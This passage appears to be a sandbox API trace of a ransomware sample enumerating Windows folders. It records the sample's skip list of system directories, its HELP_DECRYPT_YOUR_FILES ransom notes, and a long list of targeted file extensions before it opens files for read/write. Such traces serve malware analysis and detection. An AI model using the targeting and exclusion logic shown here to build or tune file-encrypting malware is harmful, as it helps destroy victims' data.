	[0167.455] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="cookies") returned 0x0
	[0167.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.455] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="programdata") returned 0x0
	[0167.455] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.455] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.455] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d4c379e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.456] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.456] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d4c379e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d4c379e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d55bfad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.456] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d49d329, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d49d329, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d4c379e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.456] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1
	[0167.456] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="..") returned 1
	[0167.456] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2=".") returned 1
	[0167.456] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device"
	[0167.456] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\"
	[0167.456] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}"
	[0167.457] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}"
	[0167.457] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\"
	[0167.457] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\"
	[0167.457] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*"
	[0167.457] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0167.464] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 91
	[0167.464] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.464] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", cchLength=0x5b | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 0x5b
	[0167.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.464] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="windows") returned 0x0
	[0167.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.465] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="boot") returned 0x0
	[0167.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.465] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="system volume information") returned 0x0
	[0167.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.465] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="temp") returned 0x0
	[0167.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="program files") returned 0x0
	[0167.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="appdata") returned 0x0
	[0167.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="application data") returned 0x0
	[0167.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="winnt") returned 0x0
	[0167.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="tmp") returned 0x0
	[0167.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.468] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="cache") returned 0x0
	[0167.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.468] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.469] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="webcache") returned 0x0
	[0167.469] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.470] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="inetcache") returned 0x0
	[0167.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.470] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="nvidia") returned 0x0
	[0167.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.470] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="packages") returned 0x0
	[0167.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.471] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="cookies") returned 0x0
	[0167.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.471] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpSrch="programdata") returned 0x0
	[0167.471] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.471] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1
	[0167.471] lstrcmpW (lpString1="background.png", lpString2="..") returned 1
	[0167.471] lstrcmpW (lpString1="background.png", lpString2=".") returned 1
	[0167.471] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\"
	[0167.472] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="background.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"
	[0167.472] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 102
	[0167.472] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.472] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", cchLength=0x66 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 0x66
	[0167.472] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.472] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.472] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"
	[0167.472] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 102
	[0167.473] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.473] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.473] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0167.473] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.473] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.474] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.474] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.474] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.476] CloseHandle (hObject=0xffffffff) returned 1
	[0167.476] CloseHandle (hObject=0xffffffff) returned 1
	[0167.476] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1
	[0167.476] lstrcmpW (lpString1="behavior.xml", lpString2="..") returned 1
	[0167.476] lstrcmpW (lpString1="behavior.xml", lpString2=".") returned 1
	[0167.476] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\"
	[0167.476] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="behavior.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"
	[0167.477] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 100
	[0167.477] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.477] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 0x64
	[0167.477] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.477] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", lpSrch="help_decrypt_your_files") returned 0x0
